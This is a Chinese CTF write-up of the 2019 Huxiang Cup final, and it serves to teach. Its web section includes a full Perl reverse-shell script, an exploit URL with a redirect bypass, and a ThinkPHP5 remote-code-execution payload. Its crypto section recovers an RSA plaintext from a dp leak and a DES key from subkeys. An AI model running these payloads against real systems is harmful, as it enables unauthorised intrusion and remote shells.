2019湖湘杯

前言

湖湘杯抢钱大赛,drl

Web

untar

<?php
// One scratch directory per client, keyed on the caller's address.
$sandbox = "sandbox/" . md5($_SERVER["REMOTE_ADDR"]);
echo $sandbox."</br>";
@mkdir($sandbox);
@chdir($sandbox);
// Only the scheme prefix of the supplied URL is checked (http:// or https://);
// the host is not validated at all, and the check is skipped when "url" is absent.
if (isset($_GET["url"]) && !preg_match('/^(http|https):\/\/.*/', $_GET["url"]))
die();
// "|" is the only character stripped before the URL is quoted for the shell.
$url = str_replace("|", "", $_GET["url"]);
// The download is delegated to the external GET command. Whatever that command
// does after the initial request (the writeup's bypass relies on it following a
// redirect) is never re-checked against the scheme filter above.
$data = shell_exec("GET " . escapeshellarg($url));
// The caller picks both the sub-directory (dots removed) and the file name
// beneath the sandbox, so the fetched body is stored at a caller-chosen
// relative path.
$info = pathinfo($_GET["filename"]);
$dir = str_replace(".", "", basename($info["dirname"]));
@mkdir($dir);
@chdir($dir);
@file_put_contents(basename($info["basename"]), $data);
// The stored file is then handed to an external UNTAR command.
shell_exec("UNTAR ".escapeshellarg(basename($info["basename"])));
highlight_file(__FILE__);

与2017 hitcon ssrfme类似,但是这里只能用http://或者https://,并且过滤了|,因此使用重定向绕过,参考https://www.jianshu.com/p/3f82685f56a8

找一个perl后门

#!/usr/bin/perl -w
# perl-reverse-shell - A Reverse Shell implementation in PERL
# NOTE(review): when run as a CGI this script forks into the background, renames
# its process and re-points STDIN/STDOUT/STDERR at an outbound TCP socket. The
# comments marked "Detection note" point at the host-side artifacts a defender
# can look for.
use strict;
use Socket;
use FileHandle;
use POSIX;
my $VERSION = "1.0";

# Where to send the reverse shell. Change these.
my $ip = 'xxx.xxx.xxx.xxx';
my $port = 1234;

# Options
my $daemon = 1;
my $auth = 0; # 0 means authentication is disabled and any
# source IP can access the reverse shell
my $authorised_client_pattern = qr(^127\.0\.0\.1$);

# Declarations
my $global_page = "";
my $fake_process_name = "/usr/sbin/apache";

# Change the process name to be less conspicious
# Detection note: the displayed name "[httpd]" (and later $fake_process_name)
# will not match the interpreter named in the shebang; that mismatch is a
# useful thing to alert on.
$0 = "[httpd]";

# Authenticate based on source IP address if required
if (defined($ENV{'REMOTE_ADDR'})) {
cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");

if ($auth) {
unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {
cgiprint("ERROR: Your client isn't authorised to view this page");
cgiexit();
}
}
} elsif ($auth) {
cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address. Denying access");
cgiexit(0);
}

# Background and dissociate from parent process if required
# The parent returns the CGI page and exits; the child carries on below.
if ($daemon) {
my $pid = fork();
if ($pid) {
cgiexit(0); # parent exits
}

setsid();
chdir('/');
umask(0);
}

# Make TCP connection for reverse shell
# Detection note: an outbound connection from a web-server process to $ip:$port
# is the network-side indicator.
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {
cgiprint("Sent reverse shell to $ip:$port");
cgiprintpage();
} else {
cgiprint("Couldn't open reverse shell to $ip:$port: $!");
cgiexit();
}

# Redirect STDIN, STDOUT and STDERR to the TCP connection
open(STDIN, ">&SOCK");
open(STDOUT,">&SOCK");
open(STDERR,">&SOCK");
# Detection note: shell history is disabled for the spawned shell.
$ENV{'HISTFILE'} = '/dev/null';
system("w;uname -a;id;pwd");
exec({"/bin/sh"} ($fake_process_name, "-i"));

# Wrapper around print
# Appends one paragraph to the page buffer that cgiprintpage() emits later.
sub cgiprint {
my $line = shift;
$line .= "<p>\n";
$global_page .= $line;
}

# Wrapper around exit
sub cgiexit {
cgiprintpage();
exit 0; # 0 to ensure we don't give a 500 response.
}


# Form HTTP response using all the messages gathered by cgiprint so far
# NOTE(review): the separators between the headers read "\r " here rather than
# "\r\n"; this looks like a copy/paste loss in the listing — confirm against the
# original before relying on the response being well-formed.
sub cgiprintpage {
print "Content-Length: " . length($global_page) . "\r Connection: close\r Content-Type: text\/html\r\n\r\n" . $global_page;
}

将其部署到服务器上,然后访问

http://183.129.189.62:12507/?url=http://your_vps/backdoor.txt&filename=URI/glarcy.pm

在服务器写一个302.php

<?php
// Answer every request with a redirect to the configured location.
$url = "glarcy://glarcy.com";
header("Location: " . $url);
?>

访问?filename=xxx&url=http://your_vps/302.php,成功反弹shell

h1

执行readflag拿到flag

h2

Thinkphp?

Thinkphp5 rce

_method=__construct&filter[]=system&server[REQUEST_METHOD]=cat /flag

crypto

give me your passport

简单aes,使用题目给出的附件直接生成Admin的cipher,然后提交

h3

Rsa

已知dp、n、e、c求m,使用网上现成的脚本https://github.com/Zui-Qing-Feng/RSA/blob/master/%E5%B7%B2%E7%9F%A5e%2Cn%2Cdp%2Cc%E6%B1%82m

#!/usr/bin/python  
# coding:utf-8

import gmpy2
from Crypto.Util.number import long_to_bytes

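dp = 84373069210173690047629226878686144017052129353931011112880892379361035492516066159394115482289291025932915787077633999791002846189004408043685986856359812230222233165493645074459765748901898518115384084258143483508823079115319711227124403284267559950883054402576935436305927705016459382628196407373896831725
n = 22000596569856085362623019573995240143720890380678581299411213688857584612953014122879995808816872221032805734151343458921719334360194024890377075521680399678533655114261000716106870610083356478621445541840124447459943322577740268407217950081217130055057926816065068275999620502766866379465521042298370686053823448099778572878765782711260673185703889168702746195779250373642505375725925213796848495518878490786035363094086520257020021547827073768598600151928787434153003675096254792245014217044607440890694190989162318846104385311646123343795149489946251221774030484424581846841141819601874562109228016707364220840611
e = 65537
c = 14874271064669918581178066047207495551570421575260298116038863877424499500626920855863261194264169850678206604144314318171829367575688726593323863145664241189167820996601561389159819873734368810449011761054668595565217970516125181240869998009561140277444653698278073509852288720276008438965069627886972839146199102497874818473454932012374251932864118784065064885987416408142362577322906063320726241313252172382519793691513360909796645028353257317044086708114163313328952830378067342164675055195428728335222242094290731292113709866489975077052604333805889421889967835433026770417624703011718120347415460385182429795735


def recover_plaintext(dp, e, n, c):
    """Recover m = c^d mod n given the CRT exponent dp = d mod (p - 1).

    Because e * dp == 1 (mod p - 1), dp * e - 1 is a multiple k * (p - 1)
    with 1 <= k < e, so p is found by trying every k in that range and
    checking which candidate divides n.

    Returns the integer plaintext, or None when no k in [1, e] yields a
    factor of n.
    """
    t = dp * e - 1
    for k in range(1, e + 1):
        if t % k:
            continue
        # Integer division is essential: "/" would go through a float under
        # Python 3 and destroy the big-integer candidate.
        p = t // k + 1
        if 1 < p < n and n % p == 0:
            q = n // p
            phi = (p - 1) * (q - 1)
            d = gmpy2.invert(e, phi) % phi
            return pow(c, d, n)
    return None


m = recover_plaintext(dp, e, n, c)
if m is None:
    raise SystemExit("no k in [1, e] satisfied dp*e - 1 == k*(p - 1)")
print(long_to_bytes(m))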

Des

子密钥反推deskey,参考

https://skysec.top/2017/12/25/%E4%B8%80%E9%81%93%E6%9C%89%E5%85%B3%E5%AF%86%E9%92%A5%E7%BC%96%E6%8E%92%E7%9A%84DES%E9%A2%98%E7%9B%AE/#%E7%94%B1%E5%AD%90%E5%AF%86%E9%92%A5%E5%8F%8D%E6%8E%A8deskey

脚本如下

# The 16 round subkeys K1..K16 (48 bits each) recovered from the challenge.
Kn = [
'101000001001011001000110001110110000011110011000',
'111000000011011001010010100101100011011000100110',
'011001001101011001110000001111000000101111100100',
'110001101101000101010010000100001110100011010011',
'001011101100001101010011011001111010010000010001',
'001011110101000100001011101010110010010101001010',
'001010110000000111011001001011001101001100000110',
'000111010100100010011001010101000100010011100110',
'000111010100100111001000010000001111100101010100',
'000100100110100110001101011000011010010010111000',
'000110010010110100000101111010010001110000001011',
'010000010010110010101101000011100101001000111110',
'110100011010010010100100000101010101100111100100',
'110100001000111010100010100000001000100011110001',
'111100001011001000100110110000111010111000010101',
'101000001011111000100110101000011001001000001011'
]

# Undo PC-2 on K1: bit i of K1 came from position __pc2[i] of C1D1, so the
# 48 known bits are scattered back and the 8 bits PC-2 dropped stay '*'.
key1 = '101000001001011001000110001110110000011110011000'
__pc2 = [
13, 16, 10, 23, 0, 4,
2, 27, 14, 5, 20, 9,
22, 18, 11, 3, 25, 7,
15, 6, 26, 19, 12, 1,
40, 51, 30, 36, 46, 54,
29, 39, 50, 44, 32, 47,
43, 48, 38, 55, 33, 52,
45, 41, 49, 35, 28, 31
]
C1D1 = ['*'] * 56
for target, bit in zip(__pc2, key1):
    C1D1[target] = bit
# print "C1: "+"".join(C1D1)[:28]
# print "D1: "+"".join(C1D1)[28:]

# C0/D0 are C1/D1 rotated right by one position (round 1 shifts left by 1),
# written out by hand from the two prints above.
C0 = '000000001*11111100*110*00*00'
D0 = '1011001*01*1101*0001011000*0'


# Undo PC-1: position i of C0D0 came from bit __pc1[i] of the 64-bit key.
__pc1 = [56, 48, 40, 32, 24, 16, 8,
0, 57, 49, 41, 33, 25, 17,
9, 1, 58, 50, 42, 34, 26,
18, 10, 2, 59, 51, 43, 35,
62, 54, 46, 38, 30, 22, 14,
6, 61, 53, 45, 37, 29, 21,
13, 5, 60, 52, 44, 36, 28,
20, 12, 4, 27, 19, 11, 3
]
C0D0 = C0 + D0
res = ['*'] * 64
for target, bit in zip(__pc1, C0D0):
    res[target] = bit
deskey = "".join(res)
# print deskey

#deskey: 01000***01**111*0100100*0110010*0110111*01*00*1*0*0*010*0100001*

def zuoyiwei(str, num):
    """Rotate the string *str* left by *num* positions (DES key-schedule shift)."""
    head, tail = str[:num], str[num:]
    return tail + head
def key_change_1(str):
    """Apply DES PC-1: select 56 bits of a 64-char key string (1-based table)."""
    key1_list = [57,49,41,33,25,17,9,1,58,50,42,34,26,18,10,2,59,51,43,35,27,19,11,3,60,52,44,36,63,55,47,39,31,23,15,7,62,54,46,38,30,22,14,6,61,53,45,37,29,21,13,5,28,20,12,4]
    return "".join(str[position - 1] for position in key1_list)

def key_change_2(str):
    """Apply DES PC-2: compress a 56-char C+D string to a 48-bit round key."""
    key2_list = [14,17,11,24,1,5,3,28,15,6,21,10,23,19,12,4,26,8,16,7,27,20,13,2,41,52,31,37,47,55,30,40,51,45,33,48,44,49,39,56,34,53,46,42,50,36,29,32]
    return "".join(str[position - 1] for position in key2_list)
def key_gen(str):
    """Expand a 64-char key string into the 16 DES round subkeys.

    PC-1 splits the key into C and D halves; each round rotates both halves
    left (by 1 in rounds 1, 2, 9 and 16, otherwise by 2) and PC-2 selects the
    round key from the rotated halves.
    """
    permuted = key_change_1(str)
    key_c, key_d = permuted[:28], permuted[28:]
    single_shift_rounds = {1, 2, 9, 16}
    key_list = []
    for round_no in range(1, 17):
        shift = 1 if round_no in single_shift_rounds else 2
        key_c = zuoyiwei(key_c, shift)
        key_d = zuoyiwei(key_d, shift)
        key_list.append(key_change_2(key_c + key_d))
    return key_list
# The deskey string above with its 16 '*' (unknown) bits replaced by the
# letters a..p so each unknown can be tracked through the key schedule.
key = "01000abc01de111f0100100g0110010h0110111i01j00k1l0m0n010o0100001p"
# print key_gen(key)
#
# Presumably the output of key_gen(key) pasted in by hand — the 16 round keys
# with the unknown bits carried through as letters, so a letter can be read off
# wherever it lands on a position whose real value is known from Kn. TODO confirm.
unknow = ['101000001001011001000110001110110000011110011000',
'1j1n000000d101100m010010100k011000110110be1a0110',
'01100100jm010d10011100000011110ae00010111110010b',
'1d0001101101000m01010nj0000100b011k01e0011010011',
'00j01110d10000110101001m01k0e1111010010b00010a01',
'0010111m0101000100n010d1101010110e100101a10010k0',
'n0d0101100000001m10j10010b101k00110100110000011a',
'000m1j01010010n010011001e10101a0010001001k10b110',
'00n111010100m00j1d0010000k00000e11111b01010101a0',
'000100100dm010011000110j0110ba01101001001011k000',
'0001100j00101m0d000n0101111010010b0k11000a001e11',
'0m000n0100101100j010110d00001110a1010010e0k11110',
'110j00ndm010010010100100b00101010101ka011110010e',
'1101n00010001110d01000m01000a0e0100010b0111k0001',
'11md0000101100100010nj10110b001k1a10111e00010101',
'10100000101mdj10n010011010100e011001a0k000001b11'
]

# def check(s):
# count = 0
# ini = 1
# for i in range(16):
# if s in unknow[i]:
# count += 1
# try:
# assert Kn[i][unknow[i].index(s)] == "1"
# except:
# ini = 0
# break
# if count == 0:
# print s + ":unknow"
# elif ini == 1:
# print s + ":1"
# else:
# print s + ":0"
#
# for x in "abcdefghijklmnop":
# check(x)

# The key with every resolvable bit filled in. The eight letters that remain
# (c, f, g, h, i, l, o, p) sit at indices 7, 15, ..., 63 — positions PC-1 never
# reads — and are enumerated exhaustively below.
undeskey = "0100000c0110111f0100100g0110010h0110111i0110011l0100010o0100001p"

def bintostr(str):
    """Pack a string of '0'/'1' characters into text, 8 bits per character (MSB first)."""
    octets = (str[offset:offset + 8] for offset in range(0, len(str), 8))
    return "".join(chr(int(octet, 2)) for octet in octets)

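# Enumerate the 8 unresolved bits c, f, g, h, i, l, o, p. They are every 8th
# bit of the key, i.e. the positions PC-1 never reads, which is why all 256
# candidates decrypt to the same plaintext (see the note after this listing).
# Counting 0..255 with c as the most significant bit reproduces the same
# order the original eight nested loops used.
for candidate in range(256):
    c, f, g, h, i, l, o, p = format(candidate, "08b")
    deskey = ("0100000" + c + "0110111" + f + "0100100" + g + "0110010" + h
              + "0110111" + i + "0110011" + l + "0100010" + o + "0100001" + p)
    deskey = bintostr(deskey)
    print(deskey)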

得到无数个key,并且解密的结果都相同,最后在key中找到AnHengDB, 拼接得到flag

h4

决赛感悟

第一次打湖湘杯决赛,长沙的食物太辣了,天气也很冷,住的挺好,但是起床时间太早了,俺就是一名网络水军。